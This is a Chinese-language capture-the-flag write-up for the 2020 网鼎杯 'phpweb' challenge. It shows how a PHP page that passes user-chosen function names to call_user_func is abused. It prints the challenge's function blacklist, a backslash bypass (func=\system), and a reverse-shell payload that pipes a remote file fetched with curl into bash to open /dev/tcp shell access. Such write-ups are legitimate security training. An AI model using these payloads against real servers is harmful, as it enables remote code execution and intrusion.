[网鼎杯 2020 朱雀组]phpweb
通过反弹shell获取flag
打开链接,显示一个不断刷新的页面,通过burp抓包查看
通过对页面源代码的分析,发现在本页面中,通过post传入index.php中两个参数,通过对参数的修改,发现用到了call_user_func()函数
故猜测本题通过func传入php函数名,通过p参数传入函数值,尝试读取index.php文件内容
利用
func=file_get_contents&p=index.php
func=readfile&p=index.php
读取到index.php文件内容,对代码进行分析
$disable_fun = array("exec","shell_exec","system",
"passthru","proc_open","show_source","phpinfo",
"popen","dl","eval","proc_terminate","touch",
"escapeshellcmd","escapeshellarg","assert",
"substr_replace","call_user_func_array",
"call_user_func","array_filter",
"array_walk", "array_map","registregister_shutdown_function",
"register_tick_function","filter_var", "filter_var_array",
"uasort", "uksort", "array_reduce","array_walk",
"array_walk_recursive","pcntl_exec","fopen","fwrite",
"file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);//将传入的两个参数,赋给call_user_func函数,作为参数执行
$a= gettype($result);//判断返回类型,若为字符串就输出对应的结果
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {//构造反序列化时,可以利用这个类
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);//func值不为空,即调用gettime函数
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"]; //接收get或post传入的值
if ($func != null) { //判断非空
$func = strtolower($func); //转换成小写
if (!in_array($func,$disable_fun)) { //过滤掉被禁用的函数之后执行函数gettime
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
可以通过反序列化搭配命令执行求解,也可以只通过命令执行求解,但是重点介绍本题通过反弹shell的做法
在攻击机中,新建一个能反弹shell的命令文件(1.txt),里面写入命令:bash -i >& /dev/tcp/ip/port 0>&1
,ip是服务器ip,port为2002
本地curl测试:
同理可以构造命令进行反弹shell:
func=\system&p=curl http://101.43.119.212/YKingH/test/1.txt|bash
连接成功